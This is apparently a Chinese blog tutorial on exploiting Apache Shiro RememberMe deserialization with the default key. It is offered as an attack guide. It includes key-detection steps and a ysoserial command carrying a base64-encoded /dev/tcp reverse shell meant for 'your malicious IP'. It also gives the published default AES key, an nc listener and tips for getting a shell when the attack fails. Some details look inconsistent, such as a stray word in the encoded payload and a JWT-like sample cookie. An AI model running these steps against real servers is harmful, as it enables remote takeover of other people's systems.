shiro攻防利用

一. 工具准备

  • 核心工具:ShiroExploit(最常用,自动检测密钥、生成Payload)、ysoserial(生成恶意序列化对象);

  • 辅助工具:Burp Suite(抓取Cookie、修改Cookie发送请求)、nc(监听反弹Shell)、Base64编码工具;

  • 前提条件:目标使用受影响的Shiro版本(≤1.2.4)或未修改默认密钥;目标开启RememberMe功能;目标可出网(反弹Shell场景);目标项目依赖CommonsCollections等可利用组件。

二. 完整利用步骤

步骤1:检测目标是否存在Shiro漏洞(密钥探测)

方法1:使用ShiroExploit工具自动探测

bash 复制代码
# 运行ShiroExploit工具(Java版) java -jar ShiroExploit-2.5.jar -u http://目标IP:端口 # 自动探测目标是否存在Shiro漏洞,检测默认密钥

方法2:手动探测(Burp Suite)

  1. 访问目标登录页面,勾选「记住我」,输入正确账号密码登录,抓取返回的RememberMe Cookie;

  2. 将Cookie值Base64解码,若解码后能看到明显的序列化特征(如aced0005开头),说明目标开启Shiro RememberMe功能;

  3. 使用已知默认密钥,对任意内容加密、Base64编码,替换RememberMe Cookie,若返回500错误或异常日志,说明密钥正确,存在漏洞。

步骤2:生成恶意序列化Payload(ysoserial)

使用ysoserial生成包含反弹Shell命令的恶意序列化对象,命令如下:

bash 复制代码
# 生成CommonsCollections3类型的恶意序列化对象,反弹Shell(替换为你的恶意IP和监听端口) java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtYyAnY2hpbGRyZW4gMTI3LjAuMC4xIDIwMDAwIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzIwMDAwICYm} | {base64,-d} | {bash,-i}" > payload.ser

说明:CommonsCollections3是最常用的利用链,需目标项目依赖该组件;若目标无此依赖,可尝试CommonsCollections4、JRMP等其他利用链。

使用已知的Shiro密钥(如默认密钥kPH+bIxk5D2deZiIxcaaaA==),对恶意序列化对象进行AES加密、Base64编码,生成伪造的RememberMe Cookie:

  • 工具生成:ShiroExploit工具可直接输入密钥、反弹命令,自动生成伪造Cookie,无需手动加密;

  • 手动加密(简化):AES加密(ECB模式、PKCS5Padding填充)→ Base64编码,最终得到的字符串即为RememberMe Cookie值。

步骤4:监听反弹Shell,发送恶意请求

在恶意服务器上,用nc监听指定端口(与反弹Shell命令一致):

bash 复制代码
nc -lvp 20000 # 监听20000端口,接收反弹Shell

用Burp Suite抓取目标任意请求(如访问首页),修改请求头中的RememberMe Cookie为伪造的值:

bash 复制代码
Cookie: rememberMe=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...(伪造的Cookie值)

发送请求,服务端会解密、反序列化伪造的Cookie,触发恶意代码执行,nc端即可收到反弹的Shell,获得目标服务器控制权。

三. 常见利用问题

  • 问题1:密钥正确,但无法反弹Shell → 解决:更换ysoserial利用链(如CommonsCollections4),检查目标是否依赖对应组件,检查目标服务器是否可出网;

  • 问题2:返回500错误,但无Shell → 解决:检查恶意命令是否正确,是否适配目标服务器系统(Windows用calc.exe测试,Linux用bash命令);

  • 问题3:工具检测不到漏洞 → 解决:手动探测密钥,检查目标是否开启RememberMe功能,是否修改了默认密钥。

相关推荐
泯泷15 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷15 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
Flittly16 小时前
【AgentScope Java新手村系列】(16)从RAG到多路检索
java·spring boot·spring
小兔崽子去哪了16 小时前
Java 生成二维码解决方案
java·后端
人活一口气21 小时前
从JVM调优到MCP协议:Java全栈技术体系深度总结与企业级架构实践
java·spring boot
NE_STOP1 天前
Vibe Coding -- 完整项目案例实操
java
荣码1 天前
GraphRAG:普通RAG只能回答"点"的问题,我踩了4个坑才搞懂
java·python
SimonKing1 天前
Google第三方授权登录
java·后端·程序员
明月光8181 天前
从一行 @Builder 说起:重新拾起 Java 的 Lombok、注解与 Builder 模式
java
考虑考虑1 天前
Mybatis实现批量插入
java·后端·mybatis